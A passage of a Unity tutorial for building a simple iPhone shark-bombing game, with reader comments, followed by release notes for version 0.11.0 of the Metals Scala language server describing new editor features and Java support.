<P> For more on this, see [perlman:perltoot|the perltoot manpage] and [perlman:perlobj|the perlobj manpage]. <P> <HR> <H2><A NAME="Perl_Modules">Perl Modules</A></H2> <P> <FONT SIZE=-1>A</FONT> module is just a package that is defined in a library file of the same name, and is designed to be reusable. It may do this by providing a mechanism for exporting some of its symbols into the symbol table of any package using it. Or it may function as a class definition and make its semantics available implicitly through method calls on the class and its objects, without explicit exportation of any symbols. Or it can do a little of both. <P> For example, to start a normal module called Some::Module, create a file called Some/Module.pm and start with this template: <P> <PRE> package Some::Module; # assumes Some/Module.pm </PRE> <P> <PRE> use strict; </PRE> <P> <PRE> BEGIN { use Exporter (); use vars qw($VERSION @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS); </PRE> <P> <PRE> # set the version for version checking $VERSION = 1.00; # if using RCS/CVS, this may be preferred $VERSION = do { my @r = (q$Revision: 2.21 $ =~ /\d+/g); sprintf "%d."."%02d" x $#r, @r }; # must be all one line, for MakeMaker </PRE> <P> <PRE> @ISA = qw(Exporter); @EXPORT = qw(&func1 &func2 &func4); %EXPORT_TAGS = ( ); # eg: TAG => [ qw!name1 name2! ], </PRE> <P> <PRE> # your exported package globals go here, # as well as any optionally exported functions @EXPORT_OK = qw($Var1 %Hashit &func3); } use vars @EXPORT_OK; </PRE> <P> <PRE> # non-exported package globals go here use vars qw(@more $stuff); </PRE> <P> <PRE> # initalize package globals, first exported ones $Var1 = ''; %Hashit = (); </PRE> <P> <PRE> # then the others (which are still accessible as $Some::Module::stuff) $stuff = ''; @more = (); </PRE> <P> <PRE> # all file-scoped lexicals must be created before # the functions below that use them. </PRE> <P> <PRE> # file-private lexicals go here my $priv_var = ''; my %secret_hash = (); </PRE> <P> <PRE> # here's a file-private function as a closure, # callable as &$priv_func; it cannot be prototyped. my $priv_func = sub { # stuff goes here. }; </PRE> <P> <PRE> # make all your functions, whether exported or not; # remember to put something interesting in the {} stubs sub func1 {} # no prototype sub func2() {} # proto'd void sub func3($$) {} # proto'd to 2 scalars </PRE> <P> <PRE> # this one isn't exported, but could be called! sub func4(\%) {} # proto'd to 1 hash ref </PRE> <P> <PRE> END { } # module clean-up code here (global destructor) </PRE> <P> Then go on to declare and use your variables in functions without any qualifications. See <U>the Exporter manpage</U><!--../lib/Exporter.html--> and the [perlman:perlmodlib|the perlmodlib manpage] for details on mechanics and style issues in module creation. <P> Perl modules are included into your program by saying <P> <PRE> use Module; </PRE> <P> or <P> <PRE> use Module LIST; </PRE> <P> This is exactly equivalent to <P> <PRE> BEGIN { require Module; import Module; } </PRE> <P> or <P> <PRE> BEGIN { require Module; import Module LIST; } </PRE> <P> As a special case <P> <PRE> use Module (); </PRE> <P> is exactly equivalent to <P> <PRE> BEGIN { require Module; } </PRE> <P> All Perl module files have the extension <EM>.pm</EM>. [perlfunc:use|use] assumes this so that you don't have to spell out ``<EM>Module.pm</EM>'' in quotes. This also helps to differentiate new modules from old <EM>.pl</EM> and <EM>.ph</EM> files. Module names are also capitalized unless they're functioning as pragmas, ``Pragmas'' are in effect compiler directives, and are sometimes called ``pragmatic modules'' (or even ``pragmata'' if you're a classicist). <P> The two statements: <P> <PRE> require SomeModule; require "SomeModule.pm"; </PRE> <P> differ from each other in two ways. In the first case, any double colons in the module name, such as <CODE>Some::Module</CODE>, are translated into your system's directory separator, usually ``/''. The second case does not, and would have to be specified literally. The other difference is that seeing the first [perlfunc:require|require] clues in the compiler that uses of indirect object notation involving ``SomeModule'', as in <CODE>$ob = purge SomeModule</CODE>, are method calls, not function calls. (Yes, this really can make a difference.) <P> Because the [perlfunc:use|use] statement implies a <CODE>BEGIN</CODE> block, the importation of semantics happens at the moment the [perlfunc:use [perlfunc:require|require] instead of [perlfunc:use|use]. With require you can get into this problem: <P> <PRE> require Cwd; # make Cwd:: accessible $here = Cwd::getcwd(); </PRE> <P> <PRE> use Cwd; # import names from Cwd:: $here = getcwd(); </PRE> <P> <PRE> require Cwd; # make Cwd:: accessible $here = getcwd(); # oops! no main::getcwd() </PRE> <P> In general, <CODE>use Module ()</CODE> is recommended over <CODE>require Module</CODE>, because it determines module availability at compile time, not in the middle of your program's execution. An exception would be if two modules each tried to [perlfunc:use|use] each other, and each also called a function from that other module. In that case, it's easy to use [perlfunc:require|require]s instead. <P> Perl packages may be nested inside other package names, so we can have package names containing <CODE>::</CODE>. But if we used that package name directly as a filename it would makes for unwieldy or impossible filenames on some systems. Therefore, if a module's name is, say, <CODE>Text::Soundex</CODE>, then its definition is actually found in the library file <EM>Text/Soundex.pm</EM>. <P> Perl modules always have a <EM>.pm</EM> file, but there may also be dynamically linked executables or autoloaded subroutine definitions associated with the module. If so, these will be entirely transparent to the user of the module. It is the responsibility of the <EM>.pm</EM> file to load (or arrange to autoload) any additional functionality. The <FONT SIZE=-1>POSIX</FONT> module happens to do both dynamic loading and autoloading, but the user can say just <CODE>use POSIX</CODE> to get it all. <P> For more information on writing extension modules, see [perlman:perlxstut|the perlxstut manpage] and [perlman:perlguts|the perlguts manpage]. <P> <HR> <H1><A NAME="SEE_ALSO">SEE ALSO</A></H1> <P> See [perlman:perlmodlib|the perlmodlib manpage] for general style issues related to building Perl modules and classes as well as descriptions of the standard library and <FONT SIZE=-1>CPAN,</FONT> <U>the Exporter manpage</U><!--../lib/Exporter.html--> for how Perl's standard import/export mechanism works, [perlman:perltoot|the perltoot manpage] for an in-depth tutorial on creating classes, [perlman:perlobj|the perlobj manpage] for a hard-core reference document on objects, and [perlman:perlsub|the perlsub manpage] for an explanation of functions and scoping. <HR> <BR>Return to the [Library]<BR>
http://www.perlmonks.org/index.pl/jacques?displaytype=xml;node_id=392
CC-MAIN-2015-48
refinedweb
2,946
51.48
VEC(3) OpenBSD Programmer's Manual SIGVEC(3) NAME sigvec - software signal facilities SYNOPSIS #include <signal.h> struct sigvec { void (*sv_handler)(); int sv_mask; int sv_flags; }; int.- block(3) or sigsetmask(3) call, or when a signal is delivered to the pro- cess. union of the current signal mask, the signal to be delivered, and the signal mask as- sociated with the handler to be invoked. sigvec() assigns a handler for a specific signal. If vec is non-zero, it specifies an action (SIG_DFL, SIG_IGN, or a handler routine) and mask to be used when delivering the specified signal. de- faults are process termination, possibly with core dump; no action; stop- ping the process; or continuing the process. See the signal list below for each signal's default action. If sv_handler is set to SIG_IGN, the default action for the signal is to discard the signal, and if a signal re- quested, or the call may forced to terminate with the error EINTR. Inter- rupting of pending calls is requested by setting the SV_INTERRUPT bit in sv. execve(2) reinstates the default action for all signals which were caught and resets all signals to be caught on the user stack. Ignored signals remain ignored; the signal mask remains the same; signals that interrupt. EXAMPLE For an example of signal handler declarations, see sigaction(2). SEE ALSO kill(1), kill(2), ptrace(2), sigaction(2), sigaltstack(2), sigpause(2), sigprocmask(2), sigstack(2), sigsuspend(2), setjmp(3), sigblock(3), siginterrupt(3), sigsetmask(3), sigsetops(3), sigvec(3), tty(4) OpenBSD 2.6 April 29, 1991 3
http://www.rocketaware.com/man/man3/sigvec.3.htm
crawl-002
refinedweb
264
55.44
Provides methods to build wires. More... #include <BRepLib_MakeWire.hxx> Provides methods to build wires. A wire may be built : . Through an existing vertex. The edge is shared. . Through a geometric coincidence of vertices. The edge is copied and the vertices from the edge are replaced by the vertices from the wire. . The new edge and the connection vertices are kept by the algorithm. BRepLib_MakeWire MW; // for all the edges ... MW.Add(anEdge); TopoDS_Wire W = MW; NotDone MakeWire. Make a Wire from an edge. Make a Wire from two edges. Make a Wire from three edges. Make a Wire from four edges. Make a Wire from a Wire. Usefull for adding later. Add an edge to a wire. Add the edge <E> to the current wire. Add the edges of <W> to the current wire. Add the edges of <L> to the current wire. The edges are not to be consecutive. But they are to be all connected geometrically or topologically. Returns the last edge added to the wire. Returns the last connecting vertex. Returns the new wire.
https://dev.opencascade.org/doc/occt-7.1.0/refman/html/class_b_rep_lib___make_wire.html
CC-MAIN-2022-27
refinedweb
177
89.75
sem_post - unlock a semaphore (REALTIME) #include <semaphore.h> int sem_post(sem_t *sem); The sem_post() function unlocks will be allowed to return successfully from its call to sem_wait().. The sem_post() interface is reentrant with respect to signals and may be invoked from a signal-catching function. If successful, the sem_post() function returns zero; otherwise the function returns -1 and sets errno to indicate the error. The sem_post() function will fail if: - [EINVAL] - The sem does not refer to a valid semaphore. - [ENOSYS] - The function sem_post() is not supported by this implementation. None. None. None. semctl(), semget(), semop(), sem_trywait(), sem_wait(), <semaphore.h>. Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995)
http://pubs.opengroup.org/onlinepubs/007908775/xsh/sem_post.html
CC-MAIN-2014-42
refinedweb
112
58.38
OID strings are unique numeric identifiers based off of a hierarchical numeric namespace controlled by a central authority on the Internet: IANA (Internet Assigned Numbers Authority). IANA allows companies and organizations to register for a specific OID base called an enterprise number. There can only be one IANA Enterprise Number per organization. Apache has such an enterprise number. You can look at the IANA assigned numbers here. Here's the record in this database for the Apache Software Foundation: 18060 The Apache Software Foundation Alex Karasulu akarasulu@apache.org This means the ASF can use the following unique OID base 1.3.6.1.4.1.18060 for any of it's needs. However we internal here at the ASF need some kind of scheme for assigning these numbers internally so we do not have collisions. Here's what we've assigned to date: Each contact person is the authority for assigning unique OID values and ranges to projects or persons. Contact that person for more assignments. Contacts may wonder what scheme is best for making assignments. There is no rule for doing this. However some would recommend assigning the first digit past the enterprise number of an organization to be for identifying a protocol. Obviously we did not do this for Apache. The reason for this is because we feel it's better to model the assignments based on the structure of the organization since these are private ranges and need not conform to a global convention. However this still does not tell us how contacts should make assignments. I think this is up to you. Perhaps a good example will be how the Directory TLP does things which is somewhat specific to their products and the nature of their products. The ninth component in the OID could be reserved for subprojects like ApacheDS and Triplesec. This might be more attractive in TLPs with many subprojects because a single authority or contact can be used for a specific subproject. So here could be one assignment scheme: Here's how the ApacheDS OID is branched off: And here are the schema OIDs: Here are the new OIDs used: Here are the new OIDs used:
http://mail-archives.apache.org/mod_mbox/directory-commits/200911.mbox/raw/%3C1617550997.1740.1258304040020.JavaMail.www-data@brutus%3E/
CC-MAIN-2015-40
refinedweb
364
63.8
The purpose of this blog entry is to explain how you can create unit tests by using Visual Studio 2008. I’m not interested in unit tests in general -- I’m interested in building a particular type of unit test. I want to build unit tests that can be used when following good Test-Driven Development (TDD) practices when building ASP.NET MVC Web Application projects. Not all unit tests are good TDD tests. In order for a unit test to be useful for Test-Driven Development, you must be able to execute the unit test very quickly. Not all unit tests meet this requirement. For example, Visual Studio supports a special type of unit test for ASP.NET websites. You must execute this type of unit test in the context of either IIS or the development web server. This is not an appropriate type of unit test to use when practicing Test-Driven Development because this type of unit test is just too slow. In this blog entry, I’m going to provide you with a walk-through of the process of building unit tests that can be used for Test-Driven Development. I’m going to dive into the details of the Visual Studio 2008 unit testing framework. I’m also going to discuss several advanced topics such as how you can test private methods and how you can execute tests from the command line. Note: Most of the features described in this blog entry are supported by the Professional Edition of Visual Studio 2008. Unfortunately, these features are not supported by Visual Web Developer. For a comparison of the unit testing features that each edition of Visual Studio 2008 supports, see. Let’s start by creating a new ASP.NET MVC Web Application project and creating a Test Project. This part is easy. When you create a new ASP.NET MVC Web Application project, you are prompted to create a new Visual Studio Test Project. Just as long as you leave the top radio button selected -- the default option -- you get a new Test Project added to your solution automatically (see Figure 1). Figure 1 – Creating a New ASP.NET MVC Web Application Project The question is: now that you have a Test Project, what do you do with it? When you create a new ASP.NET MVC application, the project includes one controller which is named HomeController. This default controller has two methods named Index() and About(). Corresponding to the HomeController, the Test Project includes a file named HomeControlleterTest. This file contains two test methods named Index() and About(). The two test methods, Index() and About(), are empty by default (see Figure 2). You can add your test logic into the body of these methods. Figure 2 – Empty About() test method ready to be written. Let’s imagine that you want to build an online store. Imagine that you want to create a Details page for your store that displays details for a particular product. You pass a query string that contains a product Id to the Details page, and the product details are retrieved from the database and displayed. Following good Test-Driven Development practice, before you do anything else, you first write a test. You don’t write any application code until you have a test for the code. The tests for the Details page act as a criterion for success. To create a successful Details page, the following tests must be satisfied: 1. If a ProductId is not passed to the page, an exception should be thrown 2. The ProductId should be used to retrieve a Product from the database 3. If a matching Product cannot be retrieved from the database, an exception should be thrown 4. The Details View should be rendered 5. The Product should be assigned to the Details View’s ViewData So let’s implement the first test. According to the first test, if a ProductId is not passed to the Details page, an exception should be thrown. We need to add a new unit test to our Test Project. Right-click the Controllers folder in your Test Project and select Add, New Test. Select the Unit Test Template (see Figure 2). Name the new unit test ProductControllerTest. Figure 2 – Adding a new unit test Be careful about how you create a new unit test since there are multiple ways to add a unit test in the wrong way. For example, if you right-click the Controllers folder and select Add, Unit Test, then you get the Unit Test Wizard. This wizard will generate a unit test that runs in the context of a web server. That’s not what we want. If you see the dialog box in Figure 3, then you know that you have attempted to add an MVC unit test in the wrong way. Figure 3 – Whenever you see this dialog box click the Cancel button! The ProductControllerTest, by default, contains the single test method in Listing 1. Listing 1 – ProductControllerTest.cs (original) 1: [TestMethod] 2: public void TestMethod1() 3: { 4: // 5: // TODO: Add test logic here 6: // 7: } We want to modify this test method so that it tests whether an exception is thrown when the Details page is requested without a ProductId. The correct test is contained in Listing 2. Listing 2 – ProductControllerTest.cs (modified) 2: [ExpectedException(typeof(ArgumentNullException), "Exception no ProductId")] 3: public void Details_NoProductId_ThrowException() 4: { 5: ProductController controller = new ProductController(); 6: controller.Details(null); Let me explain what is going on with the test in Listing 2. The method is decorated with two attributes. The first attribute [TestMethod] identifies the method as a test method. The second attribute [ExpectedException] sets up an expectation for the test. If executing the test method does not throw an ArgumentNullException, then the test fails. We want the test to throw an exception because we want an exception to be thrown when the Details page is requested without a ProductId. The body of the test method contains two statements. The first statement creates an instance of the ProductController class. The second statement calls the controller’s Details() method. Now, at this point, we have not created the ProductController class in our MVC application. So there is no way that this test will execute successfully. But that is okay. This is the correct path to walk when practicing Test-Driven Development. First, you write a test that fails, and then you write code to fix it. So let’s run the test so we can enjoy some failure. There should be a toolbar at the top of the code editor window that contains two buttons for running tests. The first button runs the tests in the current context and the second button runs all the tests in the solution (see Figure 4). Figure 4 – Executing Visual Studio 2008 Tests What’s the difference between clicking the two buttons? Running tests in the current context executes different tests depending on the location of your cursor in the code editor window. If your cursor is located on a particular test method, only that method is executed. If your cursor is located on the test class, all tests in the test class are executed. If the Test Results window has focus, all of your tests are executed (for details, see). Actually, you should always strive to avoid clicking buttons with your mouse. Clicking buttons is slow and Test-Driven Development is all about executing tests quickly. You can execute tests by using these keyboard combinations: · Ctrl-R, A – Run all tests in solution · Ctrl-R, T – Run all tests in current context · Ctrl-R, N – Run all tests in current namespace · Ctrl-R, C – Run all tests in current class · Ctrl-R, Ctrl-A – Debug all tests in solution · Ctrl-R, Ctrl-T – Debug all tests in current context · Ctrl-R, Ctrl-N – Debug all tests in current namespace · Ctrl-R, Ctrl-C – Debug all tests in current class If you run the test method that we just created -- by hitting Ctrl-R, A -- it will fail miserably. The test won’t even compile since we have not created the ProductController class or a Details() method. This is what we need to do next. Switching back to the ASP.NET MVC project, right-click the Controllers folder and select Add, New Item. Select the Web category and select MVC Controller class. Name the new controller ProductController and click the Add button (or just hit the Enter key). A new controller is created that includes one Index() method. We want to write the bare minimum amount of code necessary to cause our unit test to pass. The ProductController class in Listing 3 will pass our unit test. Listing 3 – ProductController.cs 1: using System; 2: using System.Collections.Generic; 3: using System.Linq; 4: using System.Web; 5: using System.Web.Mvc; 6: 7: namespace MvcApplication3.Controllers 8: { 9: public class ProductController : Controller 10: { 11: public void Details(int? ProductId) 12: { 13: throw new ArgumentNullException("ProductId"); 14: } 15: } 16: } The class in Listing 3 contains one method named Details(). I erased the Index() method that you get by default when you create a new controller. The Details() method always throws an ArgumentNullException. After entering the code in Listing 3, hit the keyboard combination Ctrl-R, A (You don’t need to switch back to the Test Project to run the test). The Test Results window shows that our test was successfully passed (see Figure 5). Figure 5 – The happy green of a test successfully passed You might be thinking that this is crazy. Currently, our Details() method always throws an exception. And, yes, the Details() method would be a crazy method to use in a production application. However, the whole point of Test-Driven Development is that you focus on satisfying the test that is sitting in front of you right now. Later tests will force you to triangulate and build a more respectable looking controller method. When we built our test in the previous section, we were required to use the following two attributes: · [TestMethod] – Used to mark a method as a test method. Only methods marked with this attribute will run when you run your tests. · [TestClass] – Used to mark a class as a test class. Only classes marked with this attribute will run when you run your tests. When building tests, you always use the [TestMethod] and [TestClass] attributes. However, there are several other useful, but optional, test attributes. For example, you can use the following attribute pairs to setup and tear down tests: · [AssemblyInitialize] and [AssemblyCleanup] – Used to mark methods that execute before and after all of the tests in an assembly are executed · [ClassInitialize] and [ClassCleanup] – Used to mark methods that execute before and after all of the tests in a class are executed · [TestInitialize] and [TestCleanup] – Used to mark methods that execute before and after each test method is executed For example, you might want to create a fake HttpContext that you can use with all of your test methods. You can setup the fake HttpContext in a method marked with the [ClassInitialize] attribute and dispose of the fake HttpContext in a method marked with the [ClassCleanup] attribute. There are several attributes that you can use to provide additional information about test methods. These attributes are useful when you are working with hundreds of unit tests and you need to manage the tests by sorting and filtering the tests: · [Owner] – Enables you to specify the author of a test method · [Description] – Enables you to provide a description of a test method · [Priority] – Enables you to specify an integer priority for a test · [TestProperty] – Enables you to specify an arbitrary test property You can use these attributes when sorting and filtering tests in either the Test View window or the Test List Editor. Finally, there is an attribute that you can use to cause a particular test method to be ignored when running a test. This attribute is useful when one of your tests has a problem and you just don’t want to deal with the problem at the moment: · [Ignore] – Enables you to temporarily disable a test. You can use this attribute on either a test method or an entire test class Most of the time, when you are writing the code for your test methods, you use the methods of the Assert class. The last line of code contained in most test methods uses the Assert class to assert a condition that a test must satisfy in order for the test to pass. The Assert class supports the following static methods: · AreEqual – Asserts that two values are equal · AreNotEqual – Asserts that two values are not equal · AreNotSame – Asserts that two objects are different objects · AreSame – Asserts that two objects are the same object · Fail – Asserts that the test fails · Inconclusive – Asserts that a test result is inconclusive. Visual Studio includes this assertion for methods that it generates automatically and that you need to implement · IsFalse – Asserts that a given condition expression returns the value False · IsInstanceOfType – Asserts that a given object is an instance of a specified type · IsNotInstanceOfType – Asserts that a given object is not an instance of a specified type · IsNotNull – Asserts that an object does not represent the Null value · IsNull – Asserts that an object represents the Null value · IsTrue – Asserts that a given condition expression returns the value True · ReplaceNullChars – Replaces Null characters in a string \0 with \\0 When an Assert method fails, the Assert class throws an AssertFailedException. For example, imagine that you are writing a unit test to test a method that adds two numbers. The test method in Listing 4 uses an Assert method to check whether the method being tested returns the correct result for 2 + 2. Listing 4 – CalculateTest.cs 2: public void AddNumbersTest() 4: int result = Calculate.Add(2, 2); 5: Assert.AreEqual(result, 2 + 2); 6: } There is a special class for testing assertions about collections named the CollectionAssert class. The CollectionAssert class supports the following static methods: · AllItemsAreInstancesOfType – Asserts that each item in a collection is of a specified type · AllItemsAreNotNull – Asserts that each item in a collection is not null · AllItemsAreUnique – Asserts that each item in a collection is unique · AreEqual – Asserts that the value of each item in two collections are equal · AreEquivalent – Asserts that the values of each item in two collections are equal (but the order of the items in the first collection might not match the order of the items in the second collection). · AreNotEqual – Asserts that two collections are not equal · AreNotEquivalent – Asserts that two collections are not equivalent · Contains – Asserts that a collection contains an item · DoesNotContain – Asserts that a collection does not contain an item · IsNotSubsetOf – Asserts that one collection is not a subset of another collection · IsSubsetOf – Asserts that one collection is a subset of another collection This also is a special class, named StringAssert, for performing assertions about strings. The StringAssert class supports the following static methods: · Contains -- Asserts that a string contains a specified substring · DoesNotMatch – Asserts that a string does not match a specified regular expression · EndsWith – Asserts that a string ends with a specified substring · Matches – Asserts that a string matches a specified regular expression · StartsWith – Asserts that a string starts with a specified substring Finally, you can use the [ExpectedException] attribute to assert that a test method should throw a particular type of exception. We used the ExpectedException attribute in the walkthrough above to test whether or not a Null ProductId caused a controller to throw an ArgumentNullException. Visual Studio 2008 enables you to generate unit tests from existing code automatically. You can right-click any method in a class and select the option Create Unit Tests. Figure 6 – Generating a unit test from existing code Even practitioners of Test-Driven Development must work with legacy code. If you need to add unit tests to existing code, you can take advantage of this option to quickly create the necessary test method stubs. One big warning about this approach to adding unit tests. If you use this option on a class located in an ASP.NET MVC Web Application Project, then the Unit Test Wizard opens. Unfortunately, this wizard generates a unit test that executes within the context of a web server. This type of unit test is not appropriate for Test-Driven Development because it just takes too long to execute. Therefore, I recommend that you take the approach to generating unit tests described in this section only when working with Class Library projects. When following good Test-Driven Development practices, you test all of your code, including the private methods in your application. How do you test private methods from your test project? The problem, it might seem, is that you cannot call the private methods from within a unit test. There are two ways around this problem. First, Visual Studio 2008 can generate a façade class that exposes all the private members of the class being tested. Within Visual Studio 2008, you can right-click any class within the Code Editor and select the menu option Create Private Accessor. Selecting this menu option generates a new class that exposes all of the private methods, private properties, and private fields of the class as public methods, public properties, and public fields. For example, imagine that you want to test a class named Calculate that contains a private method named Subtract(). You can right click this class and generate an Accessor (see Figure 7). Figure 7 – Creating a Private Accessor After you create the Accessor, you can use it in your unit test code to test the Subtract method. For example, the unit test in Listing 5 tests whether the subtract method returns the right result for 7 – 5. Listing 5 – CalculateTest.cs (Accessor) 2: public void SubtractTest() 4: int result = Calculate_Accessor.Subtract(7, 5); 5: Assert.AreEqual(result, 7 - 5); Notice that in Listing 5, the Subtract() method is called on the Calculate_Accessor class and not the Calculate class. Because the Subtract() method is private, you can’t call it on the Calculate class. However, the generated Calculate_Accessor class exposes the method just fine. If you prefer, you can generate the Accessor class from the command line. Visual Studio includes a command line tool named Publicize.exe that generates a public façade for a class with private members. The second method for testing private class methods is to use reflection. By taking advantage of reflection, you can bypass access restrictions and invoke any class method and access any class property. The test in Listing 6 uses reflection to call the private Calculate.Subtract() method. Listing 6 – CalculateTest.cs (reflection) 4: MethodInfo method = typeof(Calculate).GetMethod("Subtract", BindingFlags.NonPublic | BindingFlags.Static); 5: int result = (int)method.Invoke(null, new object[] { 7, 5 }); 6: Assert.AreEqual(result, 7 - 5); The code in Listing 6 calls the private static Subtract() method by calling the Invoke() method on a MethodInfo object that represents the Subtract method (this is the kind of code that you would want to package into a utility class so that it would be easy to reuse for other tests). I confess that one of my main motivations for writing this blog entry was that I was confused by all of the various test windows and I wanted to sort them out. Visual Studio 2008 has 3 windows related to unit tests. First, there is the Test Results window (see Figure 8). This window is displayed after you run your tests. You also can display this window by selecting the menu option Test, Windows, Test Results. The Test Window displays each test that was run and displays whether the test failed or passed. Figure 8 – The Test Results window If you click on the link labeled Test run completed or Test run failed you get a page that provides more detailed information about the test run. Second, there is the Test View window (see Figure 9). You can open the Test View window by selecting the menu option Test, Windows, Test View. The Test View window lists all of your tests. You can select an individual test and run the test. You can also filter the tests in the Test View using particular test properties (for example, show only the tests written by Stephen). Figure 9 – The Test View window Third, there is the Test List Editor window (see Figure 10). Open this window by selecting the menu option Test, Windows, Test List Editor. This window enables you to organize your tests into different lists. You can create new lists of tests and add the same test to multiple lists. Creating multiple test lists is useful when you need to manage hundreds of tests. Figure 10 – The Test List Editor window After you execute your unit tests more than 25 times, you get the dialog box in Figure 11. Until I received this warning, I didn’t realize that Visual Studio creates a separate copy of all of the assemblies in a solution each time you do a test run (each time you run your unit tests). Figure 11 – A mysterious message about test runs If you use Windows Explorer and take a look inside your application’s solution folder on disk, then you can see a folder named TestResults that Visual Studio 2008 creates for you automatically. This folder contains an XML file and a subfolder for each test run. You can prevent Visual Studio 2008 from creating copies of your assemblies for each test run by disabling test deployment. In order to do this, you modify your test run configuration file. Select the menu option Test, Edit Test Run Configurations. Select the Deployment tab and uncheck the checkbox labeled Enable deployment. Figure 12 – Disabling Test Deployment Sometimes, when you go to the Test, Edit Test Run Configurations menu item, you see the message that there are no test run configurations available. In that case, you need to right-click your solution in the Solution Explorer window, select Add, New Item, and add a new Test Run Configuration. After you add a new Test Run Configuration file, you can open the dialog box in Figure12. Be warned that if you disable test deployment, you can no longer take advantage of the code coverage feature. If you aren’t using this feature, then don’t worry about it. You might want to run your unit tests from the command line. For example, you might just have a perverse dislike for Integrated Development Environments like Visual Studio and want to write all of your code using Notepad. Or, more likely, you might want to run your tests automatically as part of a custom code check-in policy. You run your tests from the command line by opening up a Visual Studio 2008 Command Prompt (All Programs, Microsoft Visual Studio 2008, Visual Studio Tools, Visual Studio 2008 Command Prompt). After you open the command prompt, navigate to the assembly generated by your test project. For example: Documents\Visual Studio 2008\Projects\MyMvcApp\MyMvcAppTests\Bin\Debug Documents\Visual Studio 2008\Projects\MyMvcApp\MyMvcAppTests\Bin\Debug Run your tests by executing the following command: mstest /testcontainer:MyMvcAppTests.dll mstest /testcontainer:MyMvcAppTests.dll Issuing this command will run all of your tests (see Figure 13). Figure 13 – Running your unit tests from the command line The goal of this blog entry was to get a better understanding of how you can use Visual Studio 2008 to write unit tests that can be used for Test-Driven Development. Visual Studio was designed to support many different types of tests and many different testing audiences. The sheer number of testing options (and test related windows) can be overwhelming. However, I hope that I have convinced you that Visual Studio 2008 can be a very effective environment for performing Test-Driven Development. Okay, so if you ignored everything else in this blog entry, at least remember that using the keyboard combination Ctrl-R, A runs all of the tests in your solution. Enough said. Any idea how to setup a server to have continuous integration running the vs08 unit tests? I have team city installed and missing some assembly to have it running. I see it as a no go if I have to isntall a visual studio 2008 on the server for that! I finally found my answer: "In order to run tests during the build, Test Edition must be installed on the build computer. In order to run unit testing, code coverage, or code analysis, Visual Studio Team System Development Edition must be installed on the build computer." You might read my bost here: weblogs.asp.net/.../set-up-a-build-computer-using-visualsvn-team-city-mstest-nunit.aspx Thanks Stephen. I haven't even seen VS2008 yet (never enough time in the day) but I hear lots of people salivating. :D Maybe next month. I've only used nunit so far.. Surely if your ProductID shouldn't be null then it shouldn't be a nullable type? Pingback from Unit Test Linq to Sql in ASP.Net MVC with Moq | Emad Ibrahim
http://weblogs.asp.net/stephenwalther/archive/2008/03/19/tdd-test-driven-development-with-visual-studio-2008-unit-tests.aspx
crawl-001
refinedweb
4,201
62.17
How To Make a 2.5D Game With Unity Tutorial: Part 1 A while back, you guys said you wanted a tutorial on “How To Make a 2.5D” game.” You guys wanted it, you got it! If you don’t know what a 2.5D game is, it’s basically a 3D game that you squish so the gameplay is only along a 2D axis. Some good examples are Super Mario Brothers Wii, Little Big Planet, or Paper Monsters. One great way to make 2.5D games (or 3D games too!) is via a popular, easy, and affordable game development tool named Unity. So in this tutorial series, I’m going to show you how you can use Unity to create a simple 2.5D game called “Shark Bomber!” If you’re new to Unity but would like to learn it, this tutorial is for you! You’ll learn how to make a simple game from scratch and learn a ton along the way. In this game, you take control of a small but (well armed) airplane, and your job is to bomb the evil sharks while protecting the lovely clownfishes! Unity doesn’t use Objective-C, so for this tutorial, you don’t need any Objective-C experience. However, some experience with an OO language is a plus – ideally C#, Java, or Actionscript. Keep in mind that this is a Mac-users tutorial – Windows users might not find it accurate for their setups. Also, keep in mind you will test on an iOS device only (not the simulator) – so make sure you have a device ready to work with! OK, so let’s dive into Unity – but be sure to avoid those sharks! :] Installing Unity First let’s install the Unity editor – if you already have it on your mac just skip this step. Download Unity from its download page. Once you have the DMG file, mount it and start the Unity installer, after a standard installation procedure you will have a /Applications/Unity folder where the binaries are located. Start Unity, and click the “Register” button (don’t worry, you can try it out for free). Select “Internet activation”, click Next, and fill in the form on the web page that appears. Important: For this tutorial, you need to choose the “Start Pro / iOS Trial” option so you can publish to the iPhone (not the plain “Free” option!) After registration completes, Unity should start up and you should see a window that looks something like this: Close down the “Welcome to Unity” popup, go to File\New Project, choose a folder somewhere on your disk and name the project SharkBomber. Make sure all the packages are unselected, and click Create Project. Now you’re at a blank slate. Wow there are a lot of buttons, eh? Don’t worry – in the next section we’ll go over it bit by bit. Unity Editor Overview Let’s do some additional setup to get things into a known configuration. In the top right-hand corner of the application window you’ll find a select box – select “Tall” from the list. This will rearrange the window contents (the default was “Wide” FYI). Now find the tab in the top left corner (just below the tool bar) saying “Game”- drag it near the bottom of the window until you see indication it’ll snap to the bottom and drop it there. Now you should see the layout from the picture below: Let’s go quickly over the different panels: - Scene: Here you move your 3D models around and can browse your 3D world. - Game: This is what your selected camera (in this case the main camera) sees – real-time until you use the editor as well; in this strip your game runs when you hit “Run” and you can test your game. - Hierarchy: Your objects’ tree (much like the HTML DOM for example), currently you have only a camera, but we’ll add some stuff here later on; the objects in this list are currently present on the scene. - Project: This is the contents of your project, your assets, audio files, everything you will be using now or later on. - Inspector: Here you see all the properties of the selected object in the scene and you can adjust them; unique about Unity is that the Inspector is alive when you run your scene so it’s your debugger too! - Toolbar: Here you have the tools to interact with the objects in your scene and the Run and Pause buttons to test your scene. In your Unity3D project you can have many different scenes and you can switch between them. Currently you have one empty scene open in the editor. Let’s save it. - Right-click inside the Project panel and choose “Create/Folder” – a new folder appears. - Rename it to “Scenes” – you can do this by single left click on the folder name, or by selecting the folder and pressing “Enter”. - Now from the main menu choose “File/Save scene” – navigate the save dialogue to [your project directory]/Assets/Scenes and save the scene as “LevelScene”. Phew! OK – that’s done. Let’s check – in your Project panel open the Scenes folder – there’s your LevelScene scene. Cool! Now we are ready to run the game – hit the Play button on top! Not much changes – but in fact your game is running inside the Game panel! Don’t forget to stop the game by clicking the Play button again (this is important!) Setting up an iPhone Unity3D project One of the nice things about Unity is that it can build games for iPhone, Mac, Wii and other platforms. In this tutorial we’ll be building an iPhone game so we need to setup some details first. From the menu, choose “File/Build Settings” and click the “Add current” button to add the currently selected scene to the project. You can see when it’s added that it’s got an index of “0”, which means it’ll be the first scene to be loaded when the game starts. This is exactly what we want. From the Platform list select iOS and click “Switch platform” button. The unity logo appears now in the iOS row. This is all the setup we need for now, click “Player settings” and close this popup window. You’ll notice the Player settings opened in the Inspector, we need to set couple of things in here too. In the “Per platform” strip make sure the tab showing an iPhone is selected, like so: There’s lot of settings here, you know most of them from Xcode, so you can play and explore yourself later on. Now use this inspector to make the following changes: - In the “Resolution and Presentation” strip for “Default orientation” select “Landscape 